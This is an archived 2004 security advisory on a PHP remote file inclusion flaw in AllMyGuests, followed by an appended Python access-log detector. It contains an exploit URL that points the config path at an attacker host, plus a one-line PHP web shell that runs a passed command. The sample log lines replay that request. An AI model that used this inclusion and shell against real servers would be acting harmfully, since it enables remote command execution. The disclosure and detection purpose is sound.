AllMyGuests PHP Code Injection vulnerability

2004-02-17T00:00:00
ID SECURITYVULNS:DOC:5774
Type securityvulns
Reporter Securityvulns
Modified 2004-02-17T00:00:00

Description

* AllMyGuests PHP Code Injection vulnerability *

Product : AllMyGuests
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

**** Source ****

In /include/info.inc.php:


$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");


**** Exploit *******

http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

The file at http://[attacker]/include/template.inc.php contains:


<? system($cmd); ?>


**** Impact ****

Because the remote file is included and run as PHP on the target, a malicious user can execute arbitrary commands on the server.

**** Solution ******

In /include/info.inc.php, replace

$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");

with

// Abort if the config path is already set when this file is reached.
if (isset($_AMGconfig['cfg_serverpath'])){ die("Don't Hack it :)"); }

$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");
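
A log check for the request shape shown in the Exploit section, added here as an example (it is not part of the original advisory or the vendor's code). It assumes combined-format access logs and that `_AMGconfig` is never a legitimate request parameter; the sample log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d(?:\.\d)?"')
# Value schemes that make PHP include/require load code from outside the local tree.
REMOTE = re.compile(r"^\s*(?:https?|ftps?|php|data)\s*:", re.IGNORECASE)
# The application's config array; assumed never to be a legitimate request parameter.
CONFIG_PARAM = re.compile(r"^_AMGconfig(?:\[|$)")

def inspect_line(log_line):
    """Return a list of (reason, parameter, value) findings for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    findings = []
    # parse_qsl percent-decodes names and values, so %5B and http%3A%2F%2F are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if CONFIG_PARAM.match(name):
            findings.append(("config-overwrite", name, value))
        if REMOTE.match(value):
            findings.append(("remote-include-value", name, value))
    return findings

# Constructed sample lines (not real traffic); addresses and hosts are reserved examples.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2004:10:00:01 +0000] "GET /allmylinks/index.php?page=2 HTTP/1.0" 200 5120',
    '192.0.2.66 - - [17/Feb/2004:10:00:07 +0000] "GET /allmylinks/include/info.inc.php'
    '?_AMGconfig[cfg_serverpath]=http://attacker.example/&cmd=uname%20-a HTTP/1.0" 200 312',
    '192.0.2.66 - - [17/Feb/2004:10:00:09 +0000] "GET /allmylinks/include/info.inc.php'
    '?_AMGconfig%5Bcfg_serverpath%5D=HTTP%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 312',
    '192.0.2.11 - - [17/Feb/2004:10:00:12 +0000] "GET /allmylinks/index.php?ref=local/page.php HTTP/1.0" 200 2048',
]

def scan(lines):
    """Map line index -> findings, for lines with at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_line(line))}

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```

A hit on either rule for a direct request to a file under /include/ is worth reviewing together with the web server's outbound connections at the same timestamp.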

**** Credits ****

bnfx : bnfx@antisocial.com

Mad_Skater : m4dsk4t3r@hotmail.com

TechTeam Brazilian Crew .